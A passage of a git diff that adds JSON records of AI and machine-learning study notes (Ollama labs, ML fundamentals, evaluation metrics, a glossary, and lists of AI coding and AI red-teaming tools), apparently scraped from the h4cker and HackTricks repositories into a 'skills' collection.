+ "- **Hidden Layers**: Intermediate layers that perform transformations on the input data. The number of hidden layers and neurons in each layer can vary, leading to different architectures.",
+ "- **Output Layer**: The final layer that produces the output of the network, such as class probabilities in classification tasks.",
+ "### Activation Functions",
+ "When a layer of neurons processes input data, each neuron applies a weight and a bias to the input (`z = w * x + b`), where `w` is the weight, `x` is the input, and `b` is the bias. The output of the neuron is then passed through an **activation function to introduce non-linearity** into the model. This activation function basically indicates if the next neuron \"should be activated and how much\". This allows the network to learn complex patterns and relationships in the data, enabling it to approximate any continuous function.",
+ "Therefore, activation functions introduce non-linearity into the neural network, allowing it to learn complex relationships in the data. Common activation functions include:",
+ "- **Sigmoid**: Maps input values to a range between 0 and 1, often used in binary classification.",
+ "- **ReLU (Rectified Linear Unit)**: Outputs the input directly if it is positive; otherwise, it outputs zero. It is widely used due to its simplicity and effectiveness in training deep networks.",
+ "- **Tanh**: Maps input values to a range between -1 and 1, often used in hidden layers."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/AI/AI-Deep-Learning.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_04920fe9bfb8.json b/skills/ai_research_04920fe9bfb8.json
new file mode 100644
index 0000000..b4cc954
--- /dev/null
+++ b/skills/ai_research_04920fe9bfb8.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_04920fe9bfb8",
+ "category": "ai-research",
+ "title": "lab 02 cli advanced",
+ "description": "# Lab 2: Working with the CLI - Advanced Command-Line Operations\n\n## Objective\nIn this lab, you will explore advanced CLI features of Ollama, including model management, configuration, embeddings generation, and working with different model variants. You'll gain proficiency in using Ollama from the command line for various tasks.\n\n## Prerequisites\n- Completed Lab 1 (Ollama installed and working)\n- Basic understanding of command-line operations\n- At least one model already downloaded (e.g., `gemm",
+ "payloads": [
+ "# Lab 2: Working with the CLI - Advanced Command-Line Operations",
+ "## Objective",
+ "In this lab, you will explore advanced CLI features of Ollama, including model management, configuration, embeddings generation, and working with different model variants. You'll gain proficiency in using Ollama from the command line for various tasks.",
+ "## Prerequisites",
+ "- Completed Lab 1 (Ollama installed and working)",
+ "- Basic understanding of command-line operations",
+ "- At least one model already downloaded (e.g., `gemma3`)",
+ "## Estimated Time",
+ "45-60 minutes",
+ "## Part 1: Model Discovery and Information",
+ "### Step 1: Explore Available Models",
+ "1. Visit the Ollama library in your browser: [https://ollama.com/library](https://ollama.com/library)",
+ "2. Browse different model families (Llama, Mistral, Gemma, etc.)",
+ "3. Note the different size variants (3B, 7B, 13B, etc.)",
+ "### Step 2: Understanding Model Tags"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ollama-labs/lab-02-cli-advanced.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_0c654b257370.json b/skills/ai_research_0c654b257370.json
new file mode 100644
index 0000000..33baf6a
--- /dev/null
+++ b/skills/ai_research_0c654b257370.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_0c654b257370",
+ "category": "ai-research",
+ "title": "AI ML use cases",
+ "description": "# Examples of AI and machine learning applications and use cases\n\n1. **Predictive Analytics**: In various sectors, AI is used to analyze data and predict future trends.\n2. **Voice-Activated Assistants**: AI powers voice-activated assistants like Siri, Alexa, and Google Assistant.\n3. **Self-Driving Cars**: AI and ML are crucial in the development of autonomous vehicles, facilitating decision-making and navigation.\n4. **Fraud Detection**: In the banking sector, AI helps to detect fraud by analyzin",
+ "payloads": [
+ "# Examples of AI and machine learning applications and use cases",
+ "1. **Predictive Analytics**: In various sectors, AI is used to analyze data and predict future trends.",
+ "2. **Voice-Activated Assistants**: AI powers voice-activated assistants like Siri, Alexa, and Google Assistant.",
+ "3. **Self-Driving Cars**: AI and ML are crucial in the development of autonomous vehicles, facilitating decision-making and navigation.",
+ "4. **Fraud Detection**: In the banking sector, AI helps to detect fraud by analyzing patterns and anomalies.",
+ "5. **Recommendation Systems**: ML algorithms are used in recommendation systems on platforms like Netflix and Amazon to suggest products or content based on user behavior.",
+ "6. **Language Translation Services**: AI is employed in services like Google Translate to facilitate real-time language translation.",
+ "7. **Healthcare Diagnosis**: AI can assist in diagnosing diseases by analyzing medical images and data.",
+ "8. **Personalized Marketing**: Businesses use AI to analyze customer data and personalize marketing campaigns.",
+ "9. **Chatbots and Virtual Assistants**: These are used in customer service to handle queries and provide information.",
+ "10. **Supply Chain Optimization**: AI can help optimize supply chain logistics through predictive analytics.",
+ "11. **E-commerce Visual Recognition**: Platforms use AI to enable visual search and recognition features in e-commerce.",
+ "12. **Smart Home Devices**: AI powers smart home devices to learn and adapt to the preferences of the users.",
+ "13. **Agricultural AI**: In agriculture, AI is used for precision farming, predicting crop diseases, and optimizing yields.",
+ "14. **Facial Recognition**: Used in security and authentication processes, AI enables facial recognition technology."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ML-Fundamentals/AI-ML_use_cases.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_0ea680e0a57c.json b/skills/ai_research_0ea680e0a57c.json
new file mode 100644
index 0000000..4e65143
--- /dev/null
+++ b/skills/ai_research_0ea680e0a57c.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_0ea680e0a57c",
+ "category": "ai-research",
+ "title": "ai security tools",
+ "description": "# AI Security Tools\n\nThis is a work in progress, curated list of AI Security tools:\n\n## Open Source Tools for AI Red Teaming\n\n### Predictive AI\n- [The Adversarial Robustness Toolbox (ART)](https://github.com/Trusted-AI/adversarial-robustness-toolbox)\n- [Armory](https://github.com/twosixlabs/armory)\n- [Foolbox](https://github.com/bethgelab/foolbox)\n- [DeepSec](https://github.com/ryderling/DEEPSEC)\n- [TextAttack](https://github.com/QData/TextAttack)\n\n### Generative AI\n- [PyRIT](https://github.com/",
+ "payloads": [
+ "# AI Security Tools",
+ "This is a work in progress, curated list of AI Security tools:",
+ "## Open Source Tools for AI Red Teaming",
+ "### Predictive AI",
+ "- [The Adversarial Robustness Toolbox (ART)](https://github.com/Trusted-AI/adversarial-robustness-toolbox)",
+ "- [Armory](https://github.com/twosixlabs/armory)",
+ "- [Foolbox](https://github.com/bethgelab/foolbox)",
+ "- [DeepSec](https://github.com/ryderling/DEEPSEC)",
+ "- [TextAttack](https://github.com/QData/TextAttack)",
+ "### Generative AI",
+ "- [PyRIT](https://github.com/Azure/PyRIT)",
+ "- [Garak](https://github.com/NVIDIA/garak)",
+ "- [Prompt Fuzzer](https://github.com/prompt-security/ps-fuzz)",
+ "- [Guardrail](https://github.com/guardrails-ai/guardrails)",
+ "- [Promptfoo](https://github.com/promptfoo/promptfoo)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ai_security_tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_0eb0b004f839.json b/skills/ai_research_0eb0b004f839.json
new file mode 100644
index 0000000..9c90676
--- /dev/null
+++ b/skills/ai_research_0eb0b004f839.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_0eb0b004f839",
+ "category": "ai-research",
+ "title": "model evaluation and metrics",
+ "description": "# AI Model Evaluation and Metrics Tutorial\n\nEvaluating AI models is crucial to understand their performance and make informed improvements. Different tasks (classification, regression, ranking) require different evaluation metrics. This tutorial covers key metrics for each type, explains their significance and use-cases, and provides Python examples (using **scikit-learn** and **NumPy**, and SciPy for ranking) to compute them. We also discuss trade-offs between metrics and how to choose the righ",
+ "payloads": [
+ "# AI Model Evaluation and Metrics Tutorial",
+ "Evaluating AI models is crucial to understand their performance and make informed improvements. Different tasks (classification, regression, ranking) require different evaluation metrics. This tutorial covers key metrics for each type, explains their significance and use-cases, and provides Python examples (using **scikit-learn** and **NumPy**, and SciPy for ranking) to compute them. We also discuss trade-offs between metrics and how to choose the right ones for your problem.",
+ "## 1. Classification Metrics",
+ "Classification metrics assess how well a model predicts discrete class labels (e.g. spam vs not-spam). Many classification metrics are derived from the **confusion matrix** of true vs predicted labels. The confusion matrix is a table showing counts of **True Positives (TP)**, **True Negatives (TN)**, **False Positives (FP)**, and **False Negatives (FN)**. Each metric gives a different perspective on classifier performance.",
+ "### Confusion Matrix",
+ "A **confusion matrix** is a table that visualizes the performance of a classification model by comparing actual labels with predicted labels (see [Confusion matrix - Wikipedia](https://en.wikipedia.org/wiki/Confusion_matrix#:~:text=In%20the%20field%20of%20machine,usually%20called%20a%20matching%20matrix)). Each row represents the actual class and each column represents the predicted class. For a binary classification (with classes \u201cPositive\u201d and \u201cNegative\u201d), the confusion matrix might look like:",
+ "Predicted Negative Predicted Positive",
+ "Actual Negative TN FP",
+ "Actual Positive FN TP",
+ "The diagonal elements (TN and TP) are correct predictions, and off-diagonals are errors (FP = type I error, FN = type II error). The confusion matrix helps derive metrics like accuracy, precision, recall, etc., and lets you see which classes are being confused by the model (hence the name).",
+ "### Accuracy",
+ "**Accuracy** is the simplest classification metric: it is the proportion of all predictions that the model got right. In terms of the confusion matrix, it\u2019s `(TP + TN) / (TP + TN + FP + FN)`. Accuracy gives an overall indication of correctness.",
+ "*Significance:* Accuracy can be useful as a quick check to see if a model is training correctly and for comparing models when the class distribution is roughly balanced. However, **accuracy can be misleading for imbalanced datasets**. For example, if 99% of instances are class A, a model that always predicts A will be 99% accurate but essentially useless for finding class B. In such cases, accuracy doesn\u2019t reflect the model\u2019s true effectiveness (you\u2019d be \u201caccurate\u201d 98\u201399% of the time by always predicting the majority class.",
+ "*When to use:* Use accuracy when classes are balanced and the cost of FP and FN errors is similar. Avoid using accuracy as the sole metric in class-imbalanced scenarios or when you care more about specific error types.",
+ "*Formula:* $Accuracy = \\frac{TP + TN}{TP + TN + FP + FN}$."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ML-Fundamentals/model_evaluation_and_metrics.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_0f2df156320d.json b/skills/ai_research_0f2df156320d.json
new file mode 100644
index 0000000..4ebcab9
--- /dev/null
+++ b/skills/ai_research_0f2df156320d.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_0f2df156320d",
+ "category": "ai-research",
+ "title": "lab 07 vision models",
+ "description": "# Lab 7: Vision Models - Working with Images\n\n## Objective\nIn this lab, you will learn how to work with vision-capable models in Ollama. You'll process images, ask questions about visual content, build multimodal applications, and understand the capabilities and limitations of vision models.\n\n## Prerequisites\n- Completed Labs 1-6\n- Ollama installed and running\n- Python 3.8+ with Ollama library\n- Sample images to work with\n- Understanding of multimodal AI concepts\n\n## Estimated Time\n60-75 minutes",
+ "payloads": [
+ "# Lab 7: Vision Models - Working with Images",
+ "## Objective",
+ "In this lab, you will learn how to work with vision-capable models in Ollama. You'll process images, ask questions about visual content, build multimodal applications, and understand the capabilities and limitations of vision models.",
+ "## Prerequisites",
+ "- Completed Labs 1-6",
+ "- Ollama installed and running",
+ "- Python 3.8+ with Ollama library",
+ "- Sample images to work with",
+ "- Understanding of multimodal AI concepts",
+ "## Estimated Time",
+ "60-75 minutes",
+ "## Part 1: Setting Up Vision Models",
+ "### Step 1: Pull a Vision-Capable Model",
+ "```bash",
+ "ollama pull llava"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ollama-labs/lab-07-vision-models.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_1e483bd74a61.json b/skills/ai_research_1e483bd74a61.json
new file mode 100644
index 0000000..839f63d
--- /dev/null
+++ b/skills/ai_research_1e483bd74a61.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_1e483bd74a61",
+ "category": "ai-research",
+ "title": "lab 04 python sdk",
+ "description": "# Lab 4: Python Programming with Ollama\n\n## Objective\nIn this lab, you will learn how to use the official Ollama Python library to build Python applications that leverage local LLMs. You'll create scripts, handle responses, work with embeddings, and build practical applications.\n\n## Prerequisites\n- Completed Labs 1-3\n- Python 3.8 or higher installed\n- pip (Python package manager)\n- Basic Python programming knowledge\n- A code editor (VS Code, PyCharm, or any text editor)\n- At least one Ollama mod",
+ "payloads": [
+ "# Lab 4: Python Programming with Ollama",
+ "## Objective",
+ "In this lab, you will learn how to use the official Ollama Python library to build Python applications that leverage local LLMs. You'll create scripts, handle responses, work with embeddings, and build practical applications.",
+ "## Prerequisites",
+ "- Completed Labs 1-3",
+ "- Python 3.8 or higher installed",
+ "- pip (Python package manager)",
+ "- Basic Python programming knowledge",
+ "- A code editor (VS Code, PyCharm, or any text editor)",
+ "- At least one Ollama model downloaded (e.g., `gemma3`)",
+ "## Estimated Time",
+ "75-90 minutes",
+ "## Part 1: Setup and Installation",
+ "### Step 1: Install the Ollama Python Library",
+ "```bash"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ollama-labs/lab-04-python-sdk.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_20726d757e34.json b/skills/ai_research_20726d757e34.json
new file mode 100644
index 0000000..53a1e02
--- /dev/null
+++ b/skills/ai_research_20726d757e34.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_20726d757e34",
+ "category": "ai-research",
+ "title": "ai coding tools",
+ "description": "# AI Coding Tools\n\nThe following is a non-exhaustive list of the AI tools that can help with coding. The table is sorted alphabetically .\n\n| Tool | IDE / Platform | Model & Licensing |\n| :--- | :--- | :--- |\n| **[Aider](https://aider.chat/)** | Terminal | Pay-per-use API |\n| **[Augment Code](https://www.augmentcode.com)** | Cloud, CLI, IDE | Commercial |\n| **[Claude Code](https://www.claude.com/product/claude-code)** | Terminal, VS Code, JetBrains | Commercial |\n| **[Cline](https://cline.bot/)**",
+ "payloads": [
+ "# AI Coding Tools",
+ "The following is a non-exhaustive list of the AI tools that can help with coding. The table is sorted alphabetically .",
+ "| Tool | IDE / Platform | Model & Licensing |",
+ "| :--- | :--- | :--- |",
+ "| **[Aider](https://aider.chat/)** | Terminal | Pay-per-use API |",
+ "| **[Augment Code](https://www.augmentcode.com)** | Cloud, CLI, IDE | Commercial |",
+ "| **[Claude Code](https://www.claude.com/product/claude-code)** | Terminal, VS Code, JetBrains | Commercial |",
+ "| **[Cline](https://cline.bot/)** | VS Code, Terminal | Free + Commercial |",
+ "| **[CodeGPT](https://www.codegpt.co/)** | IDE + Cloud | Tiered, self-host options |",
+ "| **[Continue.dev](https://www.continue.dev/)** | VS Code, JetBrains | Free + Commercial |",
+ "| **[Cursor](https://cursor.com/)** | VS Code-based, Background Agents (Cloud), CLI | Commercial |",
+ "| **[GitHub Copilot](https://github.com/features/copilot)** | VS Code, JetBrains, etc. | Commercial |",
+ "| **[OpenAI Codex](https://chatgpt.com/features/codex)** | Cloud, CLI, IDE | Commercial |",
+ "| **[OpenCode](https://opencode.ai/)** | Terminal native | Free |",
+ "| **[PearAI](https://www.trypear.ai/)** | VS Code | Open-source, self-host |"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ai_coding_tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_255951597c26.json b/skills/ai_research_255951597c26.json
new file mode 100644
index 0000000..11459ad
--- /dev/null
+++ b/skills/ai_research_255951597c26.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_255951597c26",
+ "category": "ai-research",
+ "title": "langchain vs llamaindex",
+ "description": "# LangChain vs LlamaIndex\nBoth LangChain and LlamaIndex emerged as leading solutions, aiming to abstract away much of the boilerplate code and provide structured ways to interact with LLMs and external data.\n\nThey share the overarching goal of making LLM application development easier, but they often approach it with different primary focuses, leading to distinct strengths and ideal use cases.\n\n---\n\n## Introducing LlamaIndex\n\n**LlamaIndex (formerly GPT Index) is a data framework for LLM applicat",
+ "payloads": [
+ "# LangChain vs LlamaIndex",
+ "Both LangChain and LlamaIndex emerged as leading solutions, aiming to abstract away much of the boilerplate code and provide structured ways to interact with LLMs and external data.",
+ "They share the overarching goal of making LLM application development easier, but they often approach it with different primary focuses, leading to distinct strengths and ideal use cases.",
+ "## Introducing LlamaIndex",
+ "**LlamaIndex (formerly GPT Index) is a data framework for LLM applications, primarily focused on making it easy to ingest, structure, and retrieve data for use with LLMs.** Its core strength lies in its robust capabilities for connecting LLMs to custom data sources, making it a powerful tool for Retrieval Augmented Generation (RAG).",
+ "### Key Features and Strengths of LlamaIndex:",
+ "* **Data Ingestion & Indexing**: LlamaIndex provides a wide array of `Readers` to load data from various sources (PDFs, Notion, Google Docs, databases, etc.). Its `Indexes` are optimized for storing and querying this data, particularly for RAG.",
+ "* **Querying and Retrieval**: It excels at transforming user queries into effective retrieval operations over your indexed data. It offers various `Query Engines` and `Retrievers` tailored for different data structures and retrieval strategies (e.g., semantic search, keyword search, hybrid search).",
+ "* **Structured Data Integration**: Beyond unstructured text, LlamaIndex has strong capabilities for working with semi-structured and structured data, such as tables, knowledge graphs, and relational databases.",
+ "* **Performance Optimization**: LlamaIndex focuses on optimizing the RAG pipeline for performance, especially for large datasets.",
+ "* **Context Augmentation**: Its primary goal is to provide the most relevant context to the LLM, enhancing its ability to answer questions grounded in your data.",
+ "* **Emphasis on Data Loading and Indexing**: If your primary challenge is efficiently loading and indexing vast amounts of complex, unstructured, or semi-structured data for RAG, LlamaIndex is often the go-to choice.",
+ "## LangChain vs. LlamaIndex: A Comparison",
+ "While there's significant overlap and they are often used together, let's highlight their core differences and when each might be preferred.",
+ "| Feature / Aspect | LangChain | LlamaIndex |"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/LangChain/langchain-vs-llamaindex.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_298d76c2a424.json b/skills/ai_research_298d76c2a424.json
new file mode 100644
index 0000000..2b23ea7
--- /dev/null
+++ b/skills/ai_research_298d76c2a424.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_298d76c2a424",
+ "category": "ai-research",
+ "title": "ai security tools",
+ "description": "# AI Security Tools\n\nThis is a work in progress, curated list of AI Security tools:\n\n## Open Source Tools for AI Red Teaming\n\n### Predictive AI\n- [The Adversarial Robustness Toolbox (ART)](https://github.com/Trusted-AI/adversarial-robustness-toolbox)\n- [Armory](https://github.com/twosixlabs/armory)\n- [Foolbox](https://github.com/bethgelab/foolbox)\n- [DeepSec](https://github.com/ryderling/DEEPSEC)\n- [TextAttack](https://github.com/QData/TextAttack)\n\n### Generative AI\n- [PyRIT](https://github.com/",
+ "payloads": [
+ "# AI Security Tools",
+ "This is a work in progress, curated list of AI Security tools:",
+ "## Open Source Tools for AI Red Teaming",
+ "### Predictive AI",
+ "- [The Adversarial Robustness Toolbox (ART)](https://github.com/Trusted-AI/adversarial-robustness-toolbox)",
+ "- [Armory](https://github.com/twosixlabs/armory)",
+ "- [Foolbox](https://github.com/bethgelab/foolbox)",
+ "- [DeepSec](https://github.com/ryderling/DEEPSEC)",
+ "- [TextAttack](https://github.com/QData/TextAttack)",
+ "### Generative AI",
+ "- [PyRIT](https://github.com/Azure/PyRIT)",
+ "- [Garak](https://github.com/NVIDIA/garak)",
+ "- [Prompt Fuzzer](https://github.com/prompt-security/ps-fuzz)",
+ "- [Guardrail](https://github.com/guardrails-ai/guardrails)",
+ "- [Promptfoo](https://github.com/promptfoo/promptfoo)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ai-research/ai_security_tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_2ddb509ab424.json b/skills/ai_research_2ddb509ab424.json
new file mode 100644
index 0000000..028e27f
--- /dev/null
+++ b/skills/ai_research_2ddb509ab424.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_2ddb509ab424",
+ "category": "ai-research",
+ "title": "tf keras",
+ "description": "# Lab Guide: Image Recognition with TensorFlow and Keras\n\n## **Objective**\n\nTo provide students with hands-on experience in developing, training, and evaluating image recognition models using TensorFlow and Keras.\n\n## **Prerequisites**\n\n1. Basic understanding of Python programming.\n2. Familiarity with machine learning concepts.\n3. Python and necessary libraries installed: TensorFlow and Keras.\n\n## **Lab Outline**\n\n**Introduction to Image Recognition**:\n - Discussing the basics of image recogn",
+ "payloads": [
+ "# Lab Guide: Image Recognition with TensorFlow and Keras",
+ "## **Objective**",
+ "To provide students with hands-on experience in developing, training, and evaluating image recognition models using TensorFlow and Keras.",
+ "## **Prerequisites**",
+ "1. Basic understanding of Python programming.",
+ "2. Familiarity with machine learning concepts.",
+ "3. Python and necessary libraries installed: TensorFlow and Keras.",
+ "## **Lab Outline**",
+ "**Introduction to Image Recognition**:",
+ "- Discussing the basics of image recognition and convolutional neural networks (CNN).",
+ "**Setting Up the Environment**:",
+ "- Installing TensorFlow and Keras:",
+ "```bash",
+ "pip install tensorflow keras",
+ "**Image Data Preprocessing**:"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/labs/tf_keras.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_30155bf5ea5d.json b/skills/ai_research_30155bf5ea5d.json
new file mode 100644
index 0000000..d39fef8
--- /dev/null
+++ b/skills/ai_research_30155bf5ea5d.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_30155bf5ea5d",
+ "category": "ai-research",
+ "title": "glossary of terms",
+ "description": "# A glossary for AI-related terms:\n\n- **Activation Function:** A function in a neural network that introduces non-linear properties to the network, enabling it to learn more complex functions.\n- **Adversarial Machine Learning:** A technique in machine learning where a model is trained to identify and counteract attempts to deceive it.\n- **Agent:** In AI, an entity that perceives its environment and takes actions to maximize its chance of achieving a goal.\n- **Algorithm:** A set of rules to be fo",
+ "payloads": [
+ "# A glossary for AI-related terms:",
+ "- **Activation Function:** A function in a neural network that introduces non-linear properties to the network, enabling it to learn more complex functions.",
+ "- **Adversarial Machine Learning:** A technique in machine learning where a model is trained to identify and counteract attempts to deceive it.",
+ "- **Agent:** In AI, an entity that perceives its environment and takes actions to maximize its chance of achieving a goal.",
+ "- **Algorithm:** A set of rules to be followed in calculations or other problem-solving operations, especially by a computer.",
+ "- **Anomaly Detection:** The identification of rare items, events, or observations which raise suspicions by differing significantly from the majority of the data.",
+ "- **Autoencoder:** A type of neural network used to learn efficient codings of unlabeled data, typically for the purposes of dimensionality reduction.",
+ "- **Backpropagation:** An algorithm for iteratively adjusting the weights used in a neural network system to minimize the difference between actual and predicted outputs.",
+ "- **Bagging (Bootstrap Aggregating):** An ensemble learning technique used to improve the stability and accuracy of machine learning algorithms.",
+ "- **Bayesian Network:** A probabilistic graphical model that represents a set of variables and their conditional dependencies via a directed acyclic graph.",
+ "- **Bias (in AI):** A systematic error in the data or the model that can lead to unfair or prejudiced outcomes.",
+ "- **Big Data:** Extremely large data sets that may be analyzed computationally to reveal patterns, trends, and associations, especially relating to human behavior and interactions.",
+ "- **Boosting:** A machine learning ensemble meta-algorithm for primarily reducing bias, and also variance in supervised learning.",
+ "- **Capsule Network:** A type of neural network that uses capsules to enhance the ability of the network to understand spatial relationships and hierarchies in data.",
+ "- **Chatbot:** A software application used to conduct an online chat conversation via text or text-to-speech, instead of providing direct contact with a live human agent."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ML-Fundamentals/glossary_of_terms.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_4be73a36496f.json b/skills/ai_research_4be73a36496f.json
new file mode 100644
index 0000000..29a8df6
--- /dev/null
+++ b/skills/ai_research_4be73a36496f.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_4be73a36496f",
+ "category": "ai-research",
+ "title": "lab 01 installation and basics",
+ "description": "# Lab 1: Getting Started with Ollama - Installation and Basic Usage\n\n## Objective\nIn this lab, you will learn how to install Ollama, download your first model, and interact with it using the command-line interface. By the end of this lab, you'll understand the basics of running and chatting with local large language models.\n\n## Important Links\n- [Ollama website](https://ollama.com/)\n- [Ollama documentation](https://ollama.com/docs)\n- [Ollama GitHub repository](https://github.com/ollama/ollama)\n\n",
+ "payloads": [
+ "# Lab 1: Getting Started with Ollama - Installation and Basic Usage",
+ "## Objective",
+ "In this lab, you will learn how to install Ollama, download your first model, and interact with it using the command-line interface. By the end of this lab, you'll understand the basics of running and chatting with local large language models.",
+ "## Important Links",
+ "- [Ollama website](https://ollama.com/)",
+ "- [Ollama documentation](https://ollama.com/docs)",
+ "- [Ollama GitHub repository](https://github.com/ollama/ollama)",
+ "## Prerequisites",
+ "- A computer running macOS, Windows, or Linux",
+ "- At least 8GB of RAM (16GB recommended)",
+ "- At least 10GB of free disk space",
+ "- Basic familiarity with the command line/terminal",
+ "## Estimated Time",
+ "30-45 minutes",
+ "## Part 1: Installing Ollama"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ollama-labs/lab-01-installation-and-basics.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_51f5c0d6fc42.json b/skills/ai_research_51f5c0d6fc42.json
new file mode 100644
index 0000000..f8d8aaa
--- /dev/null
+++ b/skills/ai_research_51f5c0d6fc42.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_51f5c0d6fc42",
+ "category": "ai-research",
+ "title": "Supervised Unsupervised Reinforcement Learning",
+ "description": "# Supervised, Unsupervised, and Reinforcement Learning\n\n\n| Aspect | Supervised Learning | Unsupervised Learning | Reinforcement Learning |\n|-----------------------------|--------------------------------------------|--------------------------------------------|-------------------------------------------|\n| Definition | A type of learning where the model is trained on a labeled dataset, which means",
+ "payloads": [
+ "# Supervised, Unsupervised, and Reinforcement Learning",
+ "| Aspect | Supervised Learning | Unsupervised Learning | Reinforcement Learning |",
+ "|-----------------------------|--------------------------------------------|--------------------------------------------|-------------------------------------------|",
+ "| Definition | A type of learning where the model is trained on a labeled dataset, which means that the training data includes both input data and the corresponding correct outputs. | Learning from an unlabeled dataset, the model tries to find the underlying patterns and structures in the data. | A type of learning where the model learns to interact with an environment to achieve a goal or maximize some notion of cumulative reward. |",
+ "| Training Data | Labeled data (features and labels) | Unlabeled data (features only) | Interaction with the environment, rewards based on actions. |",
+ "| Goal | To make accurate predictions or classifications based on the input data. | To find hidden patterns or groupings in the data. | To find a strategy to obtain the maximum cumulative reward over time. |",
+ "| Algorithms | Decision Trees, Support Vector Machines, Neural Networks, etc. | Clustering (e.g., K-means), Association (e.g., Apriori), Principal Component Analysis, etc. | Q-learning, Deep Q Network (DQN), Policy Gradients, etc. |",
+ "| Real-world Applications | Image recognition, Spam detection, Credit risk analysis, etc. | Market segmentation, Anomaly detection, Recommender systems, etc. | Autonomous vehicles, Game playing (like AlphaGo), Robotics, etc. |",
+ "| Evaluation Metrics | Accuracy, Precision, Recall, F1-score, etc.| Silhouette score, Davies-Bouldin index, etc. | Reward function, which may vary greatly depending on the specific task. |",
+ "## Common Algorithms",
+ "| Supervised Learning | Unsupervised Learning | Reinforcement Learning |",
+ "|--------------------------------------------|--------------------------------------------|------------------------------------------|",
+ "| Linear Regression | K-Means Clustering | Q-Learning |",
+ "| Logistic Regression | Hierarchical Clustering | Deep Q-Network (DQN) |",
+ "| Decision Trees | DBSCAN | Policy Gradients |"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/ai-research/ML-Fundamentals/Supervised_Unsupervised_Reinforcement_Learning.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_research_5ddc26ca3f63.json b/skills/ai_research_5ddc26ca3f63.json
new file mode 100644
index 0000000..a471327
--- /dev/null
+++ b/skills/ai_research_5ddc26ca3f63.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_research_5ddc26ca3f63",
+ "category": "ai-research",
+ "title": "gorilla",
+ "description": "# Using Gorilla CLI\n\nTo complete this lab you only need a Linux computer with Python. For your convenience, you can use the terminal window in the following interactive lab:\nhttps://learning.oreilly.com/scenarios/ethical-hacking-active/9780137835720X003/\n\nTIP: There are several Cybersecurity-related interactive labs that are free with your O'Reilly subscription at: https://hackingscenarios.com\n\n## What is Gorilla?\n\nThe University of California Berkeley in collaboration with Microsoft have unveil",
+ "payloads": [
+ "# Using Gorilla CLI",
+ "To complete this lab you only need a Linux computer with Python. For your convenience, you can use the terminal window in the following interactive lab:",
+ "https://learning.oreilly.com/scenarios/ethical-hacking-active/9780137835720X003/",
+ "TIP: There are several Cybersecurity-related interactive labs that are free with your O'Reilly subscription at: https://hackingscenarios.com",
+ "## What is Gorilla?",
+ "The University of California Berkeley in collaboration with Microsoft have unveiled \"Gorilla\", a sophisticated model founded on the LLaMA model, reputed to surpass GPT-4 in generating API calls proficiently. A notable characteristic of Gorilla is its cohesive function with a document retriever, facilitating it to adapt smoothly to alterations in documents throughout the testing phase. This flexibility is vital, particularly when navigating the fluctuating nature of API documentation and versions. Moreover, Gorilla has the capability to significantly mitigate the hallucination issues, which is a common obstacle faced when utilizing Large Language Models (LLMs) directly.",
+ "They also created \"APIBench\", a comprehensive dataset that includes APIs from notable platforms such as HuggingFace, TorchHub, and TensorHub. The operational efficacy of Gorilla highlights the enormous potential harbored by this kind of LLMs and their applications. This amalgamation not only assures finer tool precision but also the capacity to stay abreast with the continuously updating documentation. Those keen on delving deeper into Gorilla can find the models and corresponding code at: https://github.com/ShishirPatil/gorilla. More details and the research paper are available at: https://gorilla.cs.berkeley.edu/",
+ "## Using Gorilla CLI",
+ "I have a few examples of [using Gorilla for Cybersecurity in this article](https://becomingahacker.org/using-gorilla-pioneering-api-interactions-in-large-language-models-for-cybersecurity-operations-252ce018be6b).",
+ "However, let's go over a few examples:",
